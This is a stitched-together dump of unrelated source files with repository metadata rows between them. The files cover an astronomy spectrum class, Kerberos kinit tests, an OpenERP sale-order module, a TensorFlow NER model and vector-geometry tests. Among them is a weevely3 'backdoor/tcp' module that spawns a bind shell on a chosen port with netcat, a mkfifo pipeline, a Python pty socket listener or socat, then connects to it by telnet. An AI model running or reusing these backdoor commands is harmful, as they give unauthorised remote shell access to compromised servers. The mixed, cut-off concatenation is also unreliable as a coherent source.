:param new_counts: new counts for the spectrum
:param new_count_errors: new errors from the spectrum
:return:
"""
if new_counts is None:
new_counts = self.counts
new_count_errors = self.count_errors
if new_exposure is None:
new_exposure = self.exposure
return BinnedSpectrum(counts=new_counts,
ebounds=ChannelSet.from_list_of_edges(self.edges),
exposure=new_exposure,
count_errors=new_count_errors,
sys_errors=self._sys_errors,
quality=self._quality,
scale_factor=self._scale_factor,
is_poisson=self._is_poisson,
mission=self._mission,
instrument=self._instrument)
@classmethod
def from_pandas(cls,pandas_dataframe,exposure,scale_factor=1.,is_poisson=False,mission=None,instrument=None):
"""
Build a spectrum from data contained within a pandas data frame.
The required columns are:
'emin': low energy bin edge
'emax': high energy bin edge
'counts': the counts in each bin
Optional column names are:
'count_errors': errors on the counts for non-Poisson data
'sys_errors': systematic error per channel
'quality' list of 3ML quality flags 'good', 'warn', 'bad'
:param pandas_dataframe: data frame containing information to be read into spectrum
:param exposure: the exposure of the spectrum
:param scale_factor: the scale factor of the spectrum
:param is_poisson: if the data are Poisson distributed
:param mission: (optional) the mission name
:param instrument: (optional) the instrument name
:return:
"""
# get the required columns
emin = np.array(pandas_dataframe['emin'])
emax = np.array(pandas_dataframe['emax'])
counts = np.array(pandas_dataframe['counts'])
ebounds = emin.tolist()
ebounds.append(emax[-1])
ebounds = ChannelSet.from_list_of_edges(ebounds)
# default optional parameters
count_errors = None
sys_errors = None
quality = None
if 'count_errors' in pandas_dataframe.keys():
count_errors = np.array(pandas_dataframe['count_errors'])
if 'sys_errors' in pandas_dataframe.keys():
sys_errors = np.array(pandas_dataframe['sys_errors'])
if 'quality' in pandas_dataframe.keys():
quality = Quality(np.array(pandas_dataframe['quality']))
return cls(counts=counts,
exposure=exposure,
ebounds=ebounds,
count_errors=count_errors,
sys_errors=sys_errors,
quality=quality,
scale_factor=scale_factor,
is_poisson=is_poisson,
mission=mission,
instrument=instrument)
def to_pandas(self,use_rate=True):
"""
make a pandas table from the spectrum.
:param use_rate: if the table should use rates or counts
:return:
"""
if use_rate:
out_name = 'rates'
out_values = self.rates
else:
out_name = 'counts'
out_values = self.rates * self.exposure
out_dict = {'emin': self.starts, 'emax': self.stops,out_name:out_values, 'quality': self.quality}
if self.rate_errors is not None:
if use_rate:
out_dict['rate_errors'] = self.rate_errors
else:
out_dict['count_errors'] =self.rate_errors * self.exposure
if self.sys_errors is not None:
out_dict['sys_errors'] = None
return pd.DataFrame(out_dict)
@classmethod
def from_time_series(cls, time_series, use_poly=False):
"""
:param time_series:
:param use_poly:
:return:
"""
raise NotImplementedError('This is still under construction')
pha_information = time_series.get_information_dict(use_poly)
is_poisson = True
if use_poly:
is_poisson = False
return cls(instrument=pha_information['instrument'],
mission=pha_information['telescope'],
tstart=pha_information['tstart'],
telapse=pha_information['telapse'],
#channel=pha_information['channel'],
counts=pha_information['counts'],
count_errors=pha_information['counts error'],
quality=pha_information['quality'],
grouping=pha_information['grouping'],
exposure=pha_information['exposure'],
backscale=1.,
is_poisson=is_poisson)
def __add__(self,other):
assert self == other, "The bins are not equal"
new_sys_errors=self.sys_errors
if new_sys_errors is None:
new_sys_errors=other.sys_errors
elif other.sys_errors is not None:
new_sys_errors += other.sys_errors
new_exposure = self.exposure + other.exposure
if self.count_errors is None and other.count_errors is None:
new_count_errors = None
else:
assert self.count_errors is not None or other.count_errors is not None, 'only one of the two spectra have errors, can not add!'
new_count_errors = (self.count_errors**2 + other.count_errors**2) ** 0.5
new_counts = self.counts + other.counts
new_spectrum = self.clone(new_counts=new_counts,
new_count_errors=new_count_errors,
new_exposure=new_exposure)
new_spectrum._tstart = min(self.tstart,other.tstart)
new_spectrum._tstop = max(self.tstop,other.tstop)
return new_spectrum
def add_inverse_variance_weighted(self, other):
assert self == other, "The bins are not equal"
if self.is_poisson or other.is_poisson:
raise Exception("Inverse_variance_weighting not implemented for poisson")
new_sys_errors=self.sys_errors
if new_sys_errors is None:
new_sys_errors=other.sys_errors
elif other.sys_errors is not None:
new_sys_errors += other.sys_errors
new_exposure = self.exposure + other.exposure
new_rate_errors = np.array([ (e1**-2 + e2**-2)**-0.5 for e1,e2 in zip(self.rate_errors,other._errors) ] )
new_rates = np.array( [ (c1*e1**-2 + c2*e2**-2) for c1,e1,c2,e2 in zip(self.rates,self._errors,other.rates, other._errors) ] ) * new_rate_errors**2
new_count_errors = new_rate_errors * new_exposure
new_counts = new_rates * new_exposure
new_counts[np.isnan(new_counts)]=0
new_count_errors[np.isnan(new_count_errors)]=0
new_spectrum = self.clone(new_counts=new_counts,
new_count_errors=new_count_errors)
new_spectrum._exposure = new_exposure
new_spectrum._tstart = min(self.tstart,other.tstart)
new_spectrum._tstop = max(self.tstop,other.tstop)
return new_spectrum
class BinnedSpectrumWithDispersion(BinnedSpectrum):
def __init__(self, counts, exposure, response, count_errors=None, sys_errors=None, quality=None, scale_factor=1.,
is_poisson=False, mission=None, instrument=None, tstart=None, tstop=None ):
"""
A binned spectrum that must be deconvolved via a dispersion or response matrix
:param counts:
:param exposure:
:param response:
:param count_errors:
:param sys_errors:
:param quality:
:param scale_factor:
:param is_poisson:
:param mission:
:param instrument:
"""
assert isinstance(response, InstrumentResponse), 'The response is not a valid instance of InstrumentResponse'
self._rsp = response
ebounds = ChannelSet.from_instrument_response(response)
super(BinnedSpectrumWithDispersion, self).__init__(counts=counts,
exposure=exposure,
ebounds=ebounds,
count_errors=count_errors,
sys_errors=sys_errors,
quality=quality,
scale_factor=scale_factor,
is_poisson=is_poisson,
mission=mission,
instrument=instrument,
tstart=tstart,
tstop=tstop)
@property
def response(self):
return self._rsp
@classmethod
def from_time_series(cls, time_series, response, use_poly=False):
"""
:param time_series:
:param use_poly:
:return:
"""
pha_information = time_series.get_information_dict(use_poly)
is_poisson = True
if use_poly:
is_poisson = False
return cls(instrument=pha_information['instrument'],
mission=pha_information['telescope'],
tstart=pha_information['tstart'],
tstop=pha_information['tstart'] + pha_information['telapse'],
#channel=pha_information['channel'],
counts =pha_information['counts'],
count_errors=pha_information['counts error'],
quality=pha_information['quality'],
#grouping=pha_information['grouping'],
exposure=pha_information['exposure'],
response=response,
scale_factor=1.,
is_poisson=is_poisson)
def clone(self, new_counts=None, new_count_errors=None, new_sys_errors=None, new_exposure=None):
"""
make a new spectrum with new counts and errors and all other
parameters the same
:param new_counts: new counts for the spectrum
:param new_count_errors: new errors from the spectrum
:return:
"""
if new_counts is None:
new_counts = self.counts
new_count_errors = self.count_errors
if new_sys_errors is None:
new_sys_errors = self.sys_errors
if new_exposure is None:
new_exposure = self.exposure
return BinnedSpectrumWithDispersion(counts=new_counts,
exposure=new_exposure,
response=self._rsp,
count_errors=new_count_errors,
sys_errors=new_sys_errors,
quality=self._quality,
scale_factor=self._scale_factor,
is_poisson=self._is_poisson,
mission=self._mission,
instrument=self._instrument)
def __add__(self,other):
#TODO implement equality in InstrumentResponse class
assert self.response is other.response
new_spectrum = super(BinnedSpectrumWithDispersion,self).__add__(other)
return new_spectrum
|
bsd-3-clause
| 6,971,004,834,332,659,000
| 27.194892
| 155
| 0.550794
| false
| 4.486099
| false
| false
| false
|
drankye/kerb-token
|
krb5/src/tests/t_general.py
|
1
|
2018
|
#!/usr/bin/python
from k5test import *
for realm in multipass_realms(create_host=False):
# Check that kinit fails appropriately with the wrong password.
output = realm.run([kinit, realm.user_princ], input='wrong\n',
expected_code=1)
if 'Password incorrect while getting initial credentials' not in output:
fail('Expected error message not seen in kinit output')
# Check that we can kinit as a different principal.
realm.kinit(realm.admin_princ, password('admin'))
realm.klist(realm.admin_princ)
# Test FAST kinit.
fastpw = password('fast')
realm.run_kadminl('ank -pw %s +requires_preauth user/fast' % fastpw)
realm.kinit('user/fast', fastpw)
realm.kinit('user/fast', fastpw, flags=['-T', realm.ccache])
realm.klist('user/fast@%s' % realm.realm)
# Test kinit against kdb keytab
realm.run([kinit, "-k", "-t", "KDB:", realm.user_princ])
# Test that we can get initial creds with an empty password via the
# API. We have to disable the "empty" pwqual module to create a
# principal with an empty password. (Regression test for #7642.)
conf={'plugins': {'pwqual': {'disable': 'empty'}}}
realm = K5Realm(create_user=False, create_host=False, krb5_conf=conf)
realm.run_kadminl('addprinc -pw "" user')
realm.run(['./t_init_creds', 'user', ''])
realm.stop()
realm = K5Realm(create_host=False)
# Spot-check KRB5_TRACE output
tracefile = os.path.join(realm.testdir, 'trace')
realm.run(['env', 'KRB5_TRACE=' + tracefile, kinit, realm.user_princ],
input=(password('user') + "\n"))
f = open(tracefile, 'r')
trace = f.read()
f.close()
expected = ('Sending initial UDP request',
'Received answer',
'Selected etype info',
'AS key obtained',
'Decrypted AS reply',
'FAST negotiation: available',
'Storing user@KRBTEST.COM')
for e in expected:
if e not in trace:
fail('Expected output not in kinit trace log')
success('FAST kinit, trace logging')
|
apache-2.0
| -8,659,719,704,759,129,000
| 36.37037
| 76
| 0.654113
| false
| 3.335537
| true
| false
| false
|
dhp-denero/LibrERP
|
sale_order_version/sale.py
|
1
|
6008
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2004-2012 Pexego Sistemas Informáticos. All Rights Reserved
# $Alejandro Núñez Liz$
# $Omar Castiñeira Saavedra$
#
# Copyright (C) 2014 Didotech srl (<http://www.didotech.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import orm, fields
from tools import ustr
class sale_order_line(orm.Model):
_inherit = "sale.order.line"
_columns = {
#'active': fields.related('order_id', 'active', type='boolean', string='Active', store=False),
'sale_line_copy_id': fields.many2one('sale.order.line', 'Orig version', required=False, readonly=False),
}
def copy_data(self, cr, uid, line_id, defaults=None, context=None):
defaults = defaults or {}
defaults['sale_line_copy_id'] = line_id
return super(sale_order_line, self).copy_data(cr, uid, line_id, defaults, context)
def copy(self, cr, uid, line_id, defaults, context=None):
defaults = defaults or {}
defaults['sale_line_copy_id'] = line_id
return super(sale_order_line, self).copy(cr, uid, line_id, defaults, context)
class sale_order(orm.Model):
""" Modificaciones de sale order para añadir la posibilidad de versionar el pedido de venta. """
_inherit = "sale.order"
def action_previous_version(self, cr, uid, ids, default=None, context=None):
if not default:
default = {}
if not context:
context = {}
attachment_obj = self.pool['ir.attachment']
orders = self.browse(cr, uid, ids, context=context)
order_ids = []
for order in orders:
vals = {
'version': (order.version and order.version or 1) + 1,
}
if not order.sale_version_id:
vals['sale_version_id'] = order.id
context['versioning'] = True
vals['name'] = (order.sale_version_id and order.sale_version_id.name or order.name) + u" V." + ustr(vals['version'])
new_order_id = self.copy(cr, uid, order.id, vals, context=context)
attachment_ids = attachment_obj.search(cr, uid, [('res_model', '=', 'sale.order'), ('res_id', '=', order.id)])
if attachment_ids:
attachment_obj.write(cr, uid, attachment_ids, {'res_id': new_order_id, 'res_name': vals['name']})
order.write({'active': False})
order_ids.append(new_order_id)
mod_obj = self.pool['ir.model.data']
res = mod_obj.get_object_reference(cr, uid, 'sale', 'view_order_form')
res_id = res and res[1] or False,
return {
'name': 'Sale Order',
'view_type': 'form',
'view_mode': 'form',
'view_id': res_id,
'res_model': 'sale.order',
'type': 'ir.actions.act_window',
'nodestroy': True,
'target': 'current',
'res_id': order_ids and order_ids[0] or False,
}
def _get_version_ids(self, cr, uid, ids, field_name, arg, context=None):
if context is None:
context = {}
res = {}
for sale in self.browse(cr, uid, ids):
if sale.sale_version_id:
res[sale.id] = self.search(cr, uid, ['|', ('sale_version_id', '=', sale.sale_version_id.id), ('id', '=', sale.sale_version_id.id), ('version', '<', sale.version), '|', ('active', '=', False), ('active', '=', True)])
else:
res[sale.id] = []
return res
_columns = {
'sale_version_id': fields.many2one('sale.order', 'Orig version', required=False, readonly=False),
'version': fields.integer('Version no.', readonly=True),
'active': fields.boolean('Active', readonly=False, help="It indicates that the sales order is active."),
'version_ids': fields.function(_get_version_ids, method=True, type="one2many", relation='sale.order', string='Versions', readonly=True)
}
_defaults = {
'active': True,
'version': 0,
'name': '/',
}
def create(self, cr, uid, vals, context=None):
if vals.get('name', '/') == '/':
shop = self.pool['sale.shop'].browse(cr, uid, vals['shop_id'], context=context)
if shop and shop.sequence_id:
sequence = self.pool['ir.sequence'].next_by_id(cr, uid, shop.sequence_id.id)
vals.update({'name': sequence})
else:
sequence = self.pool['ir.sequence'].get(cr, uid, 'sale.order')
vals.update({'name': sequence})
if (not context or not context.get('versioning', False)) and vals.get('sale_version_id', False):
del vals['sale_version_id']
vals['version'] = 0
return super(sale_order, self).create(cr, uid, vals, context)
class sale_shop(orm.Model):
_inherit = 'sale.shop'
_columns = {
'sequence_id': fields.many2one('ir.sequence', 'Entry Sequence', help="This field contains the informatin related to the numbering of the Sale Orders.", domain="[('code', '=', 'sale.order')]"),
}
|
agpl-3.0
| 3,669,966,839,879,994,000
| 41.274648
| 231
| 0.558387
| false
| 3.758923
| false
| false
| false
|
epinna/weevely3
|
modules/backdoor/tcp.py
|
1
|
3727
|
from core.vectors import PhpCode, ShellCmd, ModuleExec, Os
from core.module import Module
from core.loggers import log
from core import messages
import urllib.parse
import telnetlib
import time
class Tcp(Module):
"""Spawn a shell on a TCP port."""
def init(self):
self.register_info(
{
'author': [
'Emilio Pinna'
],
'license': 'GPLv3'
}
)
self.register_vectors(
[
ShellCmd(
"nc -l -p ${port} -e ${shell}",
name = 'netcat',
target = Os.NIX,
background = True
),
ShellCmd(
"rm -rf /tmp/f;mkfifo /tmp/f;cat /tmp/f|${shell} -i 2>&1|nc -l ${port} >/tmp/f; rm -rf /tmp/f",
name = 'netcat_bsd',
target = Os.NIX,
background = True
),
ShellCmd(
"""python -c 'import pty,os,socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("", ${port}));s.listen(1);(rem, addr) = s.accept();os.dup2(rem.fileno(),0);os.dup2(rem.fileno(),1);os.dup2(rem.fileno(),2);pty.spawn("${shell}");s.close()';""",
name = 'python_pty',
target = Os.NIX,
background = True
),
ShellCmd(
"""socat tcp-l:${port} exec:${shell}""",
name = 'socat',
target = Os.NIX,
background = True
)
]
)
self.register_arguments([
{ 'name' : 'port', 'help' : 'Port to spawn', 'type' : int },
{ 'name' : '-shell', 'help' : 'Specify shell', 'default' : '/bin/sh' },
{ 'name' : '-no-autoconnect', 'help' : 'Skip autoconnect', 'action' : 'store_true', 'default' : False },
{ 'name' : '-vector', 'choices' : self.vectors.get_names() }
])
def run(self):
# Run all the vectors
for vector in self.vectors:
# Skip vector if -vector is specified but does not match
if self.args.get('vector') and self.args.get('vector') != vector.name:
continue
# Background run does not return results
vector.run(self.args)
# If set, skip autoconnect
if self.args.get('no_autoconnect'): continue
# Give some time to spawn the shell
time.sleep(1)
urlparsed = urllib.parse.urlparse(self.session['url'])
if not urlparsed.hostname:
log.debug(
messages.module_backdoor_tcp.error_parsing_connect_s % self.args['port']
)
continue
try:
telnetlib.Telnet(urlparsed.hostname, self.args['port'], timeout = 5).interact()
# If telnetlib does not rise an exception, we can assume that
# ended correctly and return from `run()`
return
except Exception as e:
log.debug(
messages.module_backdoor_tcp.error_connecting_to_s_s_s % (
urlparsed.hostname,
self.args['port'],
e
)
)
# If autoconnect was expected but Telnet() calls worked,
# prints error message
if not self.args.get('no_autoconnect'):
log.warn(
messages.module_backdoor_tcp.error_connecting_to_s_s_s % (
urlparsed.hostname,
self.args['port'],
'remote port not open or unreachable'
)
)
|
gpl-3.0
| -6,986,358,487,308,145,000
| 32.881818
| 270
| 0.473303
| false
| 4.10011
| false
| false
| false
|
ds-hwang/deeplearning_udacity
|
cs224d_nlp/assignment2_dev/q2_NER.py
|
1
|
15598
|
import os
import getpass
import sys
import time
import numpy as np
import tensorflow as tf
from q2_initialization import xavier_weight_init
import data_utils.utils as du
import data_utils.ner as ner
from utils import data_iterator
from model import LanguageModel
class Config(object):
"""Holds model hyperparams and data information.
The config class is used to store various hyperparameters and dataset
information parameters. Model objects are passed a Config() object at
instantiation.
"""
embed_size = 50
batch_size = 64
label_size = 5
hidden_size = 100
max_epochs = 24
early_stopping = 2
dropout = 0.9
lr = 0.001
l2 = 0.001
window_size = 3
class NERModel(LanguageModel):
"""Implements a NER (Named Entity Recognition) model.
This class implements a deep network for named entity recognition. It
inherits from LanguageModel, which has an add_embedding method in addition to
the standard Model method.
"""
def load_data(self, debug=False):
"""Loads starter word-vectors and train/dev/test data."""
# Load the starter word vectors
self.wv, word_to_num, num_to_word = ner.load_wv(
'data/ner/vocab.txt', 'data/ner/wordVectors.txt')
tagnames = ['O', 'LOC', 'MISC', 'ORG', 'PER']
self.num_to_tag = dict(enumerate(tagnames))
tag_to_num = {v:k for k,v in self.num_to_tag.iteritems()}
# Load the training set
docs = du.load_dataset('data/ner/train')
self.X_train, self.y_train = du.docs_to_windows(
docs, word_to_num, tag_to_num, wsize=self.config.window_size)
if debug:
self.X_train = self.X_train[:1024]
self.y_train = self.y_train[:1024]
# Load the dev set (for tuning hyperparameters)
docs = du.load_dataset('data/ner/dev')
self.X_dev, self.y_dev = du.docs_to_windows(
docs, word_to_num, tag_to_num, wsize=self.config.window_size)
if debug:
self.X_dev = self.X_dev[:1024]
self.y_dev = self.y_dev[:1024]
# Load the test set (dummy labels only)
docs = du.load_dataset('data/ner/test.masked')
self.X_test, self.y_test = du.docs_to_windows(
docs, word_to_num, tag_to_num, wsize=self.config.window_size)
def add_placeholders(self):
"""Generate placeholder variables to represent the input tensors
These placeholders are used as inputs by the rest of the model building
code and will be fed data during training. Note that when "None" is in a
placeholder's shape, it's flexible
Adds following nodes to the computational graph
input_placeholder: Input placeholder tensor of shape
(None, window_size), type tf.int32
labels_placeholder: Labels placeholder tensor of shape
(None, label_size), type tf.float32
dropout_placeholder: Dropout value placeholder (scalar),
type tf.float32
Add these placeholders to self as the instance variables
self.input_placeholder
self.labels_placeholder
self.dropout_placeholder
(Don't change the variable names)
"""
### YOUR CODE HERE
self.input_placeholder = tf.placeholder(
tf.int32, shape=[None, self.config.window_size], name='Input')
self.labels_placeholder = tf.placeholder(
tf.float32, shape=[None, self.config.label_size], name='Target')
self.dropout_placeholder = tf.placeholder(tf.float32, name='Dropout')
### END YOUR CODE
def create_feed_dict(self, input_batch, dropout, label_batch=None):
"""Creates the feed_dict for softmax classifier.
A feed_dict takes the form of:
feed_dict = {
<placeholder>: <tensor of values to be passed for placeholder>,
....
}
Hint: The keys for the feed_dict should be a subset of the placeholder
tensors created in add_placeholders.
Hint: When label_batch is None, don't add a labels entry to the feed_dict.
Args:
input_batch: A batch of input data.
label_batch: A batch of label data.
Returns:
feed_dict: The feed dictionary mapping from placeholders to values.
"""
### YOUR CODE HERE
feed_dict = {
self.input_placeholder: input_batch,
}
if label_batch is not None:
feed_dict[self.labels_placeholder] = label_batch
if dropout is not None:
feed_dict[self.dropout_placeholder] = dropout
### END YOUR CODE
return feed_dict
def add_embedding(self):
"""Add embedding layer that maps from vocabulary to vectors.
Creates an embedding tensor (of shape (len(self.wv), embed_size). Use the
input_placeholder to retrieve the embeddings for words in the current batch.
(Words are discrete entities. They need to be transformed into vectors for use
in deep-learning. Although we won't do so in this problem, in practice it's
useful to initialize the embedding with pre-trained word-vectors. For this
problem, using the default initializer is sufficient.)
Hint: This layer should use the input_placeholder to index into the
embedding.
Hint: You might find tf.nn.embedding_lookup useful.
Hint: See following link to understand what -1 in a shape means.
https://www.tensorflow.org/versions/r0.8/api_docs/python/array_ops.html#reshape
Hint: Check the last slide from the TensorFlow lecture.
Hint: Here are the dimensions of the variables you will need to create:
L: (len(self.wv), embed_size)
Returns:
window: tf.Tensor of shape (-1, window_size*embed_size)
"""
# The embedding lookup is currently only implemented for the CPU
with tf.device('/cpu:0'):
### YOUR CODE HERE
embedding = tf.get_variable('Embedding', [len(self.wv), self.config.embed_size])
window = tf.nn.embedding_lookup(embedding, self.input_placeholder)
window = tf.reshape(
window, [-1, self.config.window_size * self.config.embed_size])
### END YOUR CODE
return window
def add_model(self, window):
"""Adds the 1-hidden-layer NN.
Hint: Use a variable_scope (e.g. "Layer") for the first hidden layer, and
another variable_scope (e.g. "Softmax") for the linear transformation
preceding the softmax. Make sure to use the xavier_weight_init you
defined in the previous part to initialize weights.
Hint: Make sure to add in regularization and dropout to this network.
Regularization should be an addition to the cost function, while
dropout should be added after both variable scopes.
Hint: You might consider using a tensorflow Graph Collection (e.g
"total_loss") to collect the regularization and loss terms (which you
will add in add_loss_op below).
Hint: Here are the dimensions of the various variables you will need to
create
W: (window_size*embed_size, hidden_size)
b1: (hidden_size,)
U: (hidden_size, label_size)
b2: (label_size)
https://www.tensorflow.org/versions/r0.7/api_docs/python/framework.html#graph-collections
Args:
window: tf.Tensor of shape (-1, window_size*embed_size)
Returns:
output: tf.Tensor of shape (batch_size, label_size)
"""
### YOUR CODE HERE
with tf.variable_scope('Layer1', initializer=xavier_weight_init()) as scope:
W = tf.get_variable(
'W', [self.config.window_size * self.config.embed_size,
self.config.hidden_size])
b1 = tf.get_variable('b1', [self.config.hidden_size])
h = tf.nn.tanh(tf.matmul(window, W) + b1)
if self.config.l2:
tf.add_to_collection('total_loss', 0.5 * self.config.l2 * tf.nn.l2_loss(W))
with tf.variable_scope('Layer2', initializer=xavier_weight_init()) as scope:
U = tf.get_variable('U', [self.config.hidden_size, self.config.label_size])
b2 = tf.get_variable('b2', [self.config.label_size])
y = tf.matmul(h, U) + b2
if self.config.l2:
tf.add_to_collection('total_loss', 0.5 * self.config.l2 * tf.nn.l2_loss(U))
output = tf.nn.dropout(y, self.dropout_placeholder)
### END YOUR CODE
return output
def add_loss_op(self, y):
"""Adds cross_entropy_loss ops to the computational graph.
Hint: You can use tf.nn.softmax_cross_entropy_with_logits to simplify your
implementation. You might find tf.reduce_mean useful.
Args:
pred: A tensor of shape (batch_size, n_classes)
Returns:
loss: A 0-d tensor (scalar)
"""
### YOUR CODE HERE
cross_entropy = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(y, self.labels_placeholder))
tf.add_to_collection('total_loss', cross_entropy)
loss = tf.add_n(tf.get_collection('total_loss'))
### END YOUR CODE
return loss
def add_training_op(self, loss):
"""Sets up the training Ops.
Creates an optimizer and applies the gradients to all trainable variables.
The Op returned by this function is what must be passed to the
`sess.run()` call to cause the model to train. See
https://www.tensorflow.org/versions/r0.7/api_docs/python/train.html#Optimizer
for more information.
Hint: Use tf.train.AdamOptimizer for this model.
Calling optimizer.minimize() will return a train_op object.
Args:
loss: Loss tensor, from cross_entropy_loss.
Returns:
train_op: The Op for training.
"""
### YOUR CODE HERE
optimizer = tf.train.AdamOptimizer(self.config.lr)
global_step = tf.Variable(0, name='global_step', trainable=False)
train_op = optimizer.minimize(loss, global_step=global_step)
### END YOUR CODE
return train_op
def __init__(self, config):
"""Constructs the network using the helper functions defined above."""
self.config = config
self.load_data(debug=False)
self.add_placeholders()
window = self.add_embedding()
y = self.add_model(window)
self.loss = self.add_loss_op(y)
self.predictions = tf.nn.softmax(y)
one_hot_prediction = tf.argmax(self.predictions, 1)
correct_prediction = tf.equal(
tf.argmax(self.labels_placeholder, 1), one_hot_prediction)
self.correct_predictions = tf.reduce_sum(tf.cast(correct_prediction, 'int32'))
self.train_op = self.add_training_op(self.loss)
def run_epoch(self, session, input_data, input_labels,
shuffle=True, verbose=True):
orig_X, orig_y = input_data, input_labels
dp = self.config.dropout
# We're interested in keeping track of the loss and accuracy during training
total_loss = []
total_correct_examples = 0
total_processed_examples = 0
total_steps = len(orig_X) / self.config.batch_size
for step, (x, y) in enumerate(
data_iterator(orig_X, orig_y, batch_size=self.config.batch_size,
label_size=self.config.label_size, shuffle=shuffle)):
feed = self.create_feed_dict(input_batch=x, dropout=dp, label_batch=y)
loss, total_correct, _ = session.run(
[self.loss, self.correct_predictions, self.train_op],
feed_dict=feed)
total_processed_examples += len(x)
total_correct_examples += total_correct
total_loss.append(loss)
##
if verbose and step % verbose == 0:
sys.stdout.write('\r{} / {} : loss = {}'.format(
step, total_steps, np.mean(total_loss)))
sys.stdout.flush()
if verbose:
sys.stdout.write('\r')
sys.stdout.flush()
return np.mean(total_loss), total_correct_examples / float(total_processed_examples)
def predict(self, session, X, y=None):
"""Make predictions from the provided model."""
# If y is given, the loss is also calculated
# We deactivate dropout by setting it to 1
dp = 1
losses = []
results = []
if np.any(y):
data = data_iterator(X, y, batch_size=self.config.batch_size,
label_size=self.config.label_size, shuffle=False)
else:
data = data_iterator(X, batch_size=self.config.batch_size,
label_size=self.config.label_size, shuffle=False)
for step, (x, y) in enumerate(data):
feed = self.create_feed_dict(input_batch=x, dropout=dp)
if np.any(y):
feed[self.labels_placeholder] = y
loss, preds = session.run(
[self.loss, self.predictions], feed_dict=feed)
losses.append(loss)
else:
preds = session.run(self.predictions, feed_dict=feed)
predicted_indices = preds.argmax(axis=1)
results.extend(predicted_indices)
return np.mean(losses), results
def print_confusion(confusion, num_to_tag):
"""Helper method that prints confusion matrix."""
# Summing top to bottom gets the total number of tags guessed as T
total_guessed_tags = confusion.sum(axis=0)
# Summing left to right gets the total number of true tags
total_true_tags = confusion.sum(axis=1)
print
print confusion
for i, tag in sorted(num_to_tag.items()):
prec = confusion[i, i] / float(total_guessed_tags[i])
recall = confusion[i, i] / float(total_true_tags[i])
print 'Tag: {} - P {:2.4f} / R {:2.4f}'.format(tag, prec, recall)
def calculate_confusion(config, predicted_indices, y_indices):
"""Helper method that calculates confusion matrix."""
confusion = np.zeros((config.label_size, config.label_size), dtype=np.int32)
for i in xrange(len(y_indices)):
correct_label = y_indices[i]
guessed_label = predicted_indices[i]
confusion[correct_label, guessed_label] += 1
return confusion
def save_predictions(predictions, filename):
"""Saves predictions to provided file."""
with open(filename, "wb") as f:
for prediction in predictions:
f.write(str(prediction) + "\n")
def test_NER():
"""Test NER model implementation.
You can use this function to test your implementation of the Named Entity
Recognition network. When debugging, set max_epochs in the Config object to 1
so you can rapidly iterate.
"""
config = Config()
with tf.Graph().as_default():
model = NERModel(config)
init = tf.initialize_all_variables()
saver = tf.train.Saver()
with tf.Session() as session:
best_val_loss = float('inf')
best_val_epoch = 0
session.run(init)
for epoch in xrange(config.max_epochs):
print 'Epoch {}'.format(epoch)
start = time.time()
###
train_loss, train_acc = model.run_epoch(session, model.X_train,
model.y_train)
val_loss, predictions = model.predict(session, model.X_dev, model.y_dev)
print 'Training loss: {}'.format(train_loss)
print 'Training acc: {}'.format(train_acc)
print 'Validation loss: {}'.format(val_loss)
if val_loss < best_val_loss:
best_val_loss = val_loss
best_val_epoch = epoch
if not os.path.exists("./weights"):
os.makedirs("./weights")
saver.save(session, './weights/ner.weights')
if epoch - best_val_epoch > config.early_stopping:
break
###
confusion = calculate_confusion(config, predictions, model.y_dev)
print_confusion(confusion, model.num_to_tag)
print 'Total time: {}'.format(time.time() - start)
saver.restore(session, './weights/ner.weights')
print 'Test'
print '=-=-='
print 'Writing predictions to q2_test.predicted'
_, predictions = model.predict(session, model.X_test, model.y_test)
save_predictions(predictions, "q2_test.predicted")
if __name__ == "__main__":
test_NER()
|
mit
| -2,195,417,113,203,144,000
| 37.136919
| 93
| 0.652904
| false
| 3.674441
| true
| false
| false
|
fortyninemaps/karta
|
tests/vector_predicate_tests.py
|
1
|
11300
|
""" Unit tests for vector geometry predicate methods """
from __future__ import division
import unittest
import numpy as np
from karta.vector.geometry import (Point, Line, Polygon,
Multipoint, Multiline, Multipolygon)
from karta.crs import (Cartesian, SphericalEarth, LonLatWGS84)
from karta.errors import CRSError
class TestUnaryPredicates(unittest.TestCase):
def test_poly_clockwise(self):
p = Polygon([(0,0), (0,1), (1,1), (1,0)])
self.assertTrue(p.isclockwise())
return
def test_poly_counterclockwise(self):
p = Polygon([(0,0), (1,0), (1,1), (0,1)])
self.assertFalse(p.isclockwise())
return
def test_poly_polar(self):
p = Polygon([(0.0, 80.0), (30.0, 80.0), (60.0, 80.0), (90.0, 80.0),
(120.0, 80.0), (150.0, 80.0), (180.0, 80.0),
(-150.0, 80.0), (-120.0, 80.0), (-90.0, 80.0),
(-60.0, 80.0), (-30.0, 80.0)], crs=SphericalEarth)
self.assertTrue(p.ispolar())
p = Polygon([(0.0, 85.0, 0.0), (90.0, 85.0, 0.0), (180.0, 85.0, 0.0),
(-90.0, 85.0, 0.0)], crs=SphericalEarth)
self.assertTrue(p.ispolar())
p = Polygon([(45.0, 30.0), (40.0, 25.0), (45.0, 20.0), (35.0, 25.0)],
crs=SphericalEarth)
self.assertFalse(p.ispolar())
p = Polygon([(-80, 0), (-50, -10), (20, -8), (35, -17), (55, 15),
(-45, 18), (-60, 12)], crs=LonLatWGS84)
self.assertFalse(p.ispolar())
p = Polygon([(45.0, 30.0), (40.0, 25.0), (45.0, 20.0), (35.0, 25.0)],
crs=Cartesian)
self.assertRaises(CRSError, p.ispolar)
return
class TestBinaryPredicates(unittest.TestCase):
def test_line_intersection(self):
line0 = Line([(0.0, 0.0), (3.0, 3.0)])
line1 = Line([(0.0, 3.0), (3.0, 0.0)])
self.assertTrue(line0.intersects(line1))
self.assertEqual(line0.intersections(line1), Multipoint([(1.5, 1.5)]))
return
def test_line_intersection2(self):
# test lines that have overlapping bounding boxes, but don't cross
# -----
# | -----
# | |
# ----- |
# -----
line0 = Line([(0.0, 0.0), (3.0, 0.0), (3.0, 3.0), (0.0, 3.0)])
line1 = Line([(1.0, 4.0), (-2.0, 4.0), (-2.0, 1.0), (1.0, 1.0)])
self.assertFalse(line0.intersects(line1))
return
